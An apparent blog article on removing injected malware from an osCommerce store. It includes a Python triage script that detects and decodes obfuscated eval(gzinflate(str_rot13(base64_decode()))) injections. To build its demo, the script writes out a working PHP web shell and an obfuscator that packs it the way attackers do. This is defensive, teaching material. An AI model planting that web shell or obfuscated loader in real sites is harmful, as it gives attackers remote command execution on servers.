Malware attacks are no longer something that only PC owners or server administrators have to fear. Website owners are now also victims of attacks propagated by hackers. In case your website is hit and for some reason you did not have a backup, there are several things you should consider doing to get back on your feet.
Malware removal can be approached systematically by following a set of steps that reverse the attack procedure.
Depending on the size of your website and the number of sites hosted on the server in question, the osCommerce malware removal steps below will vary in intensity.
In this step, you should look for files that were modified most recently before things went haywire and mark them for inspection. A good window to dig into is the 48 hours around the time the attack became manifest. Bear in mind that an attacker can reset modification times, so this is a first filter, not proof that an untouched-looking file is clean.
A quick way to narrow the search is to grep those files for 'eval' calls: eval() executes a string as PHP code, and injected malware relies on it almost every time. Though crude, this is an effective way of identifying suspect code snippets in your files.
After identifying the recently modified files, the next step is going through each one to find patterns and alterations that do not match the way your team writes code. Under most circumstances, malware removal relies on the fact that an attacker will never have the house style of the inside team, unless it was an inside job.
The most common alterations to look for are changes to file code, made either at the start of a script or at random places within it. Such alterations, though simple, can give the attacker access to your system or crash your servers outright, and the only option is to delete those lines of code.
Though this might sound simple, it is not. Injected code is rarely written in the clear; it is usually obfuscated, the most common format being base64 encoding (encoding, not encryption, so it is trivially reversible). A good Base64 decoder will do the task well for you. Encoded lines typically start with eval(gzinflate(str_rot13(base64_decode(...)))), and the layers have to be peeled in that order: base64 first, then rot13, then inflate.
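The three steps above (find recently modified files, grep them for suspect calls, peel the obfuscation) as one worked example. This is an added script, not code from the article or from osCommerce; it builds a constructed two-file tree in a temp directory, injects a sample payload into one file using the same eval(gzinflate(str_rot13(base64_decode()))) chain, and then triages the tree. The incident timestamp, the 48-hour window and the list of suspect PHP functions are assumptions you would adjust for your own site.

```python
import base64
import codecs
import os
import re
import tempfile
import time
import zlib

# Constructed sample payload; the script obfuscates it itself so everything runs offline.
PAYLOAD = "<?php if (isset($_POST['c'])) { system($_POST['c']); } ?>"
INCIDENT_TS = time.time()          # assumption: when the defacement was first noticed
WINDOW_HOURS = 48                  # the 48-hour window from the article

# Calls that almost never appear in osCommerce's own code but almost always in injected code.
SUSPECT = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13|system|passthru|shell_exec|assert)\s*\(")
# The eval(gzinflate(str_rot13(base64_decode("...")))) chain the article refers to.
CHAIN = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*["\']'
    r'([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)\s*\)'
)


def obfuscate(php: str) -> str:
    """Build the chain the way an attacker's packer does: gzdeflate -> str_rot13 -> base64."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)        # raw DEFLATE, what PHP gzinflate() expects
    deflated = c.compress(php.encode()) + c.flush()
    rotated = codecs.encode(deflated.decode("latin-1"), "rot13").encode("latin-1")
    return f'<?php eval(gzinflate(str_rot13(base64_decode("{base64.b64encode(rotated).decode()}")))); ?>'


def decode_chain(blob: str) -> str:
    """Peel the layers in PHP's evaluation order: base64_decode, str_rot13, gzinflate."""
    raw = base64.b64decode(blob)
    unrot = codecs.decode(raw.decode("latin-1"), "rot13").encode("latin-1")
    return zlib.decompress(unrot, -15).decode()


def recently_modified(root: str, since: float, until: float) -> list:
    """Step 1: every file whose mtime falls inside the window (cheap, but mtimes can be forged)."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if since <= os.path.getmtime(path) <= until:
                hits.append(path)
    return sorted(hits)


def triage(root: str, incident_ts: float = INCIDENT_TS, window_hours: int = WINDOW_HOURS) -> dict:
    """Steps 2-3: grep the recent files for suspect calls and decode any obfuscation chain found."""
    report = {}
    span = window_hours * 3600
    for path in recently_modified(root, incident_ts - span, incident_ts + span):
        with open(path, encoding="latin-1") as f:
            text = f.read()
        calls = sorted(set(SUSPECT.findall(text)))
        if not calls:
            continue
        m = CHAIN.search(text)
        report[os.path.relpath(path, root)] = {
            "suspect_calls": calls,
            "decoded": decode_chain(m.group(1)) if m else None,
        }
    return report


def build_demo() -> str:
    """Constructed osCommerce-like tree: one untouched include and one with an injected header."""
    root = tempfile.mkdtemp(prefix="oscommerce_")
    os.makedirs(os.path.join(root, "includes"))
    clean = os.path.join(root, "includes", "application_top.php")
    with open(clean, "w") as f:
        f.write("<?php require('includes/configure.php'); ?>\n")
    old = INCIDENT_TS - 90 * 86400                     # last touched months ago, outside the window
    os.utime(clean, (old, old))
    infected = os.path.join(root, "includes", "header.php")
    with open(infected, "w") as f:                      # mtime = now, i.e. inside the window
        f.write(obfuscate(PAYLOAD) + "\n<?php /* original header code follows */ ?>\n")
    return root


if __name__ == "__main__":
    for rel, info in triage(build_demo()).items():
        print(rel, info["suspect_calls"])
        if info["decoded"]:
            print("  decoded payload:", info["decoded"])
```

Run it against the document root of a real store by replacing build_demo() with the path and INCIDENT_TS with the epoch time of the first symptom. The decoded payload is what the injected line actually does; in the constructed sample it is a one-line web shell, which is exactly the kind of thing that must be deleted rather than "fixed".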
After the corrupted files have been corrected, the next thing to think about is identifying the window through which the hacker accessed your system. Though this might be tedious, especially if you are dealing with an expert, it must be done if you want to lock the hacker out for good.
The easiest way to find it is to look for script files uploaded to your upload or image folders and any other location that accepts file uploads (these vary with the Content Management System you are using). Going through these files will give you an idea of how the criminal got into your system, so you can shut the loopholes.
The most common shape a website malware attack takes is a redirect of your whole website to another host, typically planted as rewrite rules in .htaccess or as injected redirect code. To counter this, remove those rules and point the site back to your own server to make sure the phishing is totally eradicated.
Malware removal is therefore not an easy task to approach on your own, especially if you have a heavily loaded server to deal with. There is, however, always the option of contacting experts to do the job.
If you find this article interesting you also may want to check out the following blog articles: “Removing Malware from a WordPress blog” and “Consequences of your website being blacklisted by Google”.
Let us know what you think and want to learn about website security and malware! Connect with us on Google+, Twitter and Facebook or even LinkedIn!